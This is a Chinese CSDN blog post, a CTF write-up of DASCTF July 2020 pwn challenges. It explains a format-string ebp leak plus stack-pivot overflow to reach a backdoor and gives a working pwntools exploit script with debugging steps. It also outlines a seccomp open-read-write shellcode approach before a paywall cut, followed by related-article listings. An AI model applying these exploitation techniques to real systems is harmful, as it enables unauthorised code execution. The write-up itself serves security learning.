DASCTF2020-7月赛 pwn学习记录

最新推荐文章于 2024-08-25 12:49:51 发布
最新推荐文章于 2024-08-25 12:49:51 发布
阅读量935 收藏 6
点赞数 1
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44864859/article/details/107936667
版权
本文是作者关于DASCTF2020-7月赛的pwn题目学习记录,包括虚假的签到题、eg32和bigbear的解题过程。涉及格式化字符串漏洞、栈溢出、seccomp沙箱过滤、内存地址爆破、free后指针未置null导致的UAF漏洞以及栈迁移技术。作者通过调试和分析,揭示了利用漏洞获取shell的策略和解决方案。
摘要由CSDN通过智能技术生成

DASCTF2020-7月赛 虚假的签到题

说实话有点被出题人恶心到了,主要还是自己太菜了。。。😢

拿到题目直接ida打开,按f5一顿分析

image-20200725195648683

就这太简单了吧!先格式化字符串漏洞,后栈溢出,猜想肯定是先用格式化字符串泄漏canary,再利用栈溢出控制程序流,执行后门函数。查看保护机制

屏幕快照 2020-07-25 20.04.35

嗯。。。没有canary保护,那这个格式化字符串漏洞是干嘛用的?然后直接栈溢出发现拿不到shell。这就很奇怪了???其实到这里就到死胡同了,我们回头来看一下main函数的汇编代码,可以看到出题人在程序的最后做了修改

屏幕快照 2020-07-25 20.10.58

程序leave以后会修改esp为ecx-4,而ecx的值为ebp-4地址上的值。也就是:esp=*[ebp-4]-4。因此我们首先需要利用格式化字符漏洞泄漏出ebp的值,然后修改ebp-4为我们可写的地址,并且修改该地址-4处的值为backdoor,我们就可以获得shell了。

具体的调试流程:

1.启动gdb,设置两个断点分别为0x080485F5和0x80485C7

image-20200725202315157

2.运行(r),遇到第一次输入"a",程序停在0x080485C7

image-20200725202540620

屏幕快照 2020-07-25 20.25.20

可以看到此时的ebp为0xffffcfa8,位于格式化字符串偏移为2的地方,所以利用格式化字符串"%2$p"就可以泄漏出ebp中的地址了。

3.继续运行(c),遇到第二次输入"aaaa",程序停在0x080485F5

屏幕快照 2020-07-25 20.31.21

可以看到此时我们输入的字符串的起始位置是0xffffcf80,如果我们在0xffffcf80的位置上写入后门函数地址,让ebp-4的位置放上0xffffcf84,这样ecx就为0xffffcf84,而ecx-4赋给esp就正好是我们的后门函数了。

所以我们可以计算出ebp-4的位置的值应该是 ebp-0x24(0xffffcfa8 - 0xffffcf84 = 0x24)

而中间需要0x20的铺垫(0xffffcfa4 - 0xffffcf84 = 0x20)

现在可以构造exp

from pwn import *

s      = lambda data               :sh.send(data) 
sa      = lambda delim,data         :sh.sendafter(delim, data)
sl      = lambda data               :sh.sendline(data)
sla     = lambda delim,data         :sh.sendlineafter(delim, data)
sea     = lambda delim,data         :sh.sendafter(delim, data)
r      = lambda numb=4096          :sh.recv(numb)
ru      = lambda delims, drop=True  :sh.recvuntil(delims, drop)
info_addr = lambda tag, addr        :sh.info(tag +': {:#x}'.format(addr))
itr     = lambda                    :sh.interactive()
debug   = lambda command=''         :gdb.attach(sh,command)


sh=process('./qiandao')

ru(":")
sl("%2$p")
ru("\n")
stack=int(ru("\n").replace("\n",""),16)-0x24
info_addr("stack",stack)
ru("?")
payload=p32(0x0804857D)+"\x00"*0x20+p32(stack)
sl(payload)
itr()

参考链接:

https://nop-sw.github.io/wiki/wp/DASCTF-%E4%B8%83%E6%9C%88%E8%B5%9B/#_1

DASCTF-7月赛 eg32

程序本身没有开任何保护,并且逻辑也很简单,就是写入一段shellcode,程序会跳转执行这段shellcode。关键的问题在于程序中存在沙箱过滤,无法调用open、execve、syscall等无法使用。有关于沙箱过滤的这是第一次遇到,相关的前置知识可以查看这两篇文章

http://www.secwk.com/2019/09/20/6564/

https://www.anquanke.com/post/id/208364#h2-10

seccomp在ctf中大多用于禁用execve函数,解决办法就是构造shellcode,用open->read->write的方式读flag

seccomp-tools

最低0.47元/天 解锁文章
DASCTF2022 7月赋能赛 crypto wp(DASCTF2022.07赋能赛Pwn easyheap)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
08-29 429
文章目录DASCTF2022 7月赋能赛 crypto wp sigin ezNTRU NTRURSA
R()P DASCTF月赛pwn R()P题解
qq_43694952的博客
11-26 508
DASCTF月赛pwn R()P wp
DASCTF 7月部分pwn
starssgo的博客
07-25 1556
做了pwn1跟pwn3,pwn2没做出来(俺是废物)… pwn1 签到题,但是我们要记住 .text:080485F8 mov eax, 0 .text:080485FD mov ecx, [ebp+var_4] .text:08048600 leave .text:08048601 lea esp, [ecx-4] .text:08048604
DASCTF2020 7月月赛
qq_42158602的博客
07-25 781
bullshit 题目 from flag import flag def pairing(a,b): shell = max(a, b) step = min(a, b) if step == b: flag = 0 else: flag = 1 return shell ** 2 + step * 2 + flag def encrypt(message): res = '' for i in range(0,le
[DASCTF2024八月开学季!] Crypto
最新发布
Emmaaaaa's blog
08-25 1670
two_squares(n0),矩阵phi,维纳连分数,HNP,中间相遇
2020DASCTF月赛-bulls**t
k0414的博客
07-25 1760
题目: def pairing(a,b): shell = max(a, b) step = min(a, b) if step == b: flag = 0 else: flag = 1 return shell ** 2 + step * 2 + flag def encrypt(message): res = '' for i in range(0,len(message),2): res +=
DASCTF月赛 web部分
weixin_43610673的博客
04-25 2242
Ezunserialize 反序列化POP链、字符逃逸 POP链构造起来不,字符逃逸参考:https://xz.aliyun.com/t/6588 https://blog.csdn.net/assasin0308/article/details/103711024 打开送源码 POP链构造: __toString() //把类当作字符串使用时触发,返回值需要为字符串 B类的__destru...
DASCTF X GFCTF 2024|四月开启第一局
qq_61670993的博客
04-21 1017
简单题
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 我什至开发了一些脚本和工具来...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
[DASCTF 2023]controlflow
CHTXRT的博客
07-22 391
直接反编译,通过汇编代码结合动态调试综合分析,得到输入数据变化过程大致如下:(设输入字符串为。出处:https://blog.csdn.net/CHTXRT。」创作共享协议,转载请在文章明显位置注明作者及出处。
seccomp-tools:提供用于seccomp分析的强大工具
04-06
Seccomp工具 提供用于seccomp分析的强大工具。 该项目旨在(但不限于)分析CTF pwn挑战中的seccomp沙箱。 某些功能可能是CTF特有的,但对于在实际情况下分析seccomp仍然有用。 特征 转储-自动从执行文件中转储seccomp-bpf。 Disasm-将bpf转换为人类可读的格式。 简单的反编译。 尽可能显示系统调用名称和参数。 丰富多彩的! Asm-编写seccomp规则是如此简单! mu-模拟seccomp规则。 支持多架构。 安装 在RubyGems.org上可用! $ gem install seccomp-tools 如果编译时失败,请尝试: sudo apt install gcc ruby-dev 并再次安装seccomp-tools。 命令行界面 seccomp工具 $ seccomp-tools --help # Usage:
2022DASCTF MAY 出题人挑战赛 misc
mumuzi的博客
05-22 2946
MAYMISC
2022DASCTF Apr X FATE CTF部分wp
3tefanie丶zhou的博客
04-25 3141
【只是两个人相处,那么喜欢一个人,可能会觉得她哪里都好,但是以后在一起了,就要学会喜欢她的不好】
[DASCTF 7月赛] 复现
qq_61768489的博客
08-17 453
压缩包密码就是上面 的admin密码550f37c7748e。一个png ,用zsteg打开能看见有个zip,提取出来。FTK Imager 打开后Mount 该文件。上面也得到了密文U2Fs.... 是AES密文。再用efdd 打开,配合pc.raw挂载。这串数字是八进制 ,也可直接ciphey。得到了密钥 358daebef0b7d。文件名是thes3cret。访问后有源码,有过滤。...
DASCTF暑期挑战赛 Reverse复现
Yyx260019的博客
07-23 480
DosSnake:本题考查的是对8086汇编代码分析(当然也可以修改游戏程序直接输出flag,由于我的windows系统打不开游戏程序所以此方法暂且不作分析介绍了)直接拖进IDA查看汇编代码算了,由于这个程序只给了一个数据段,我们很容易就能找到代码加密逻辑(前面一大段的汇编代码都是为了实现贪吃蛇这个小游戏没啥用,我们直接看加密部分):可以看到逻辑非常简单,Dasctf的前6部分作为key,后面的26位数据作为密文,进行简单的异或加密si对应密文指针,di对应key指针,密文数据如下:直接写脚本一把逆即可得到
全国农信银CTF流量分析(凯撒会分析流量吗)
yoyo_573的博客
06-30 406
流量分析,时间盲注,题目提示了凯撒密码。转换下就得到了结果。
Pwn 环境安装
潜心习安全
10-30 3465
Pwn 环境安装教程
pwn学习笔记(8)--初识Pwn沙箱
qq_66013948的博客
08-06 1121
​ 沙箱机制,英文sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。​ 安全计算模式seccomp(Secure Computing Mode)在Linux2.6.10之后引入到kernel的特性,可用其实现一个沙箱环境。使用seccomp模式可以定义系统调用白名单和黑名单。seccomp机制用于限制应用程序可以使用的系统调用,增加系统的安全性。​ 在ctf中主要通过两种方
CTF比赛PWN项目源码及write-up解析
资源摘要信息:"CTF(Capture The Flag)是一种信息安全竞赛,其中Pwn...通过学习这些write-ups,参与者可以更深入地理解Pwn题目的解题过程,学习如何更有效地识别和利用漏洞,从而在未来的CTF比赛中取得更好的成绩。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值